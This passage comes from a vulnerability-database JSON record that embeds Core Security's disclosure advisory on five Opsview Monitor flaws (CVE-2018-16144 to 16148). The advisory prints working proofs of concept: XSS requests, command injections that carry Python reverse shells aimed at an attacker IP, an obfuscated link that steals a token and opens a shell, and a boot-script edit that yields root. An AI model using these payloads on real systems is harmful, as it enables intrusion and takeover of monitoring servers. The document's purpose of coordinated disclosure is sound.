"id": "CVE-2018-16144"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%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%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.500000",
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 0.6
}
}
VAR-201809-0906
Vulnerability from variot - Updated: 2023-12-18 12:01

The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. Opsview Monitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. Opsview Monitor has a cross-site scripting vulnerability that allows an attacker to execute malicious JavaScript code in the context of a legitimate user.

Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues.
. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1.
The following proof of concept demonstrates the vulnerability:
/-----
GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. The following proof of concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close

[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point out that this XSS is self-stored and is executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=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%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=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%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges, and the scripts that run at boot time impersonate the nagios user during their execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:

/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
    echo "Attempted to start jasperserver but MySQL credentials are wrong."
    exit 0
fi

DAEMON=/opt/opsview/jasper/bin/rc.jasperserver

test -x $DAEMON || exit 0

# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
    su - opsview -c "$DAEMON $@"
else
    exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user, who belongs to the 'opsview' group.

/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
    case "$1" in
        db_export)
            db_export
            ;;
        db_export_test)
            db_export_test
            ;;
        db_export_initial)
            TEST=1
            db_backup
            ;;
        db_import)
            db_import
            ;;
        db_install)
            db_install
            ;;
        db_backup)
            db_backup
            ;;
        db_restore)
            db_restore
            ;;
        db_exists)
            python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
            db_exists
            exit $?
            ;;
        db_upgrade)
            db_upgrade
            exit $?
            ;;
        *)
            die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}"
            ;;

    esac
    shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send the draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed that an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that they were planning to release a fix for these versions by the end of July.
2018-05-11: Core Security thanked Opsview for the confirmation.
2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked Opsview for the status update and asked for a tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining fixes.
2018-08-13: Opsview replied saying that they were targeting the week of August 24th to release the fixes for their earlier product versions and they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked Opsview for the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th.
2018-08-24: Core Security thanked Opsview for the update and proposed September 4th as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0906",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16148"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16148",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
